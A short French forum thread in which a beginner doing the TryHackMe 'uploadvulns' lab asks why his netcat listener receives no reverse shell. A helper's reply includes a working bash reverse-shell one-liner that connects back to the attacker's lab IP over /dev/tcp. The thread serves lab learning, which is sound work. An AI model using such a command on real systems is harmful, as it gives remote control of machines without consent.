Pages : 1
#1 Le 31/03/2023, à 09:05
- mansonboy
Soucis avec netcat
Bonjour,
Je suis actuellement entrain de commencer à faire des box sur try hack me et chaque fois que je dois utiliser netcat il ne fonctionne pas, me récupère rien.
J'utilise toujours sur le port 4444 :
mansonboy@mansonboy-home:~$ sudo ufw status verbose
[sudo] Mot de passe de mansonboy :
État : actif
Journalisation : on (low)
Par défaut : deny (incoming), allow (outgoing), deny (routed)
Nouveaux profils : skip
Vers Action De
---- ------ --
4444 ALLOW IN Anywhere
4444 (v6) ALLOW IN Anywhere (v6)
Cela me semble bon et ouvert.
Utilisant leur vpn :
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST> mtu 1500
inet 10.11.30.173 netmask 255.255.0.0 destination 10.11.30.173
inet6 fe80::38c2:aa5a:4f3d:966c prefixlen 64 scopeid 0x20<link>
unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 txqueuelen 500 (UNSPEC)
RX packets 116 bytes 16121 (16.1 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 268 bytes 36024 (36.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Je rentre dans le reverse-shell de l'epreuve l'ip et le port :
$ip = '10.11.30.173'; // CHANGE THIS
$port = 4444; // CHANGE THIS
Ensuite je lance netcat :
mansonboy@mansonboy-home:~$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Et lançant le fichier sur la box il devrait me récupérer quelques chose mais il me récupère rien.
C'est pas la première fois que je dois utiliser netcat et il n'a jamais fonctionne donc je pence à un soucis de configuration.
Merci d'avance pour votre aide car je suis du coup coincer pour certaine épreuve.
(ps : l’épreuve en question est uploadvulns pour ceux qui l'on fait)
Hors ligne
#2 Le 31/03/2023, à 15:31
- bruno
Re : Soucis avec netcat
Bonjour,
A priori netcat fonctionne puisqu'il annonce bien qu'il est en écoute sur le port 4444
Maintenant si tu veux obtenir un « reverse shell », il faut lancer sur la machine de la victime une commande qui permet de se connecter au port 4444 de la machine de l'attaquant. Par exemple pour obtenir un shell bash, sur la machine de la victime :
bash -i >& /dev/tcp/10.11.30.173/4444 0>&1
Je suppose que dans le défi, on te fournit un script à charger sur la machine de la victime qui va faire cela. Il faut évidemment que tu aies déjà acquis la possibilité de copier ce script sur la machine de la victime.
#3 Le 04/04/2023, à 14:16
- mansonboy
Re : Soucis avec netcat
Salut, alors je ne sais pas pourquoi ni comment mais nc c'est mit a fonctionner sans aucun changement...
Hors ligne
Pages : 1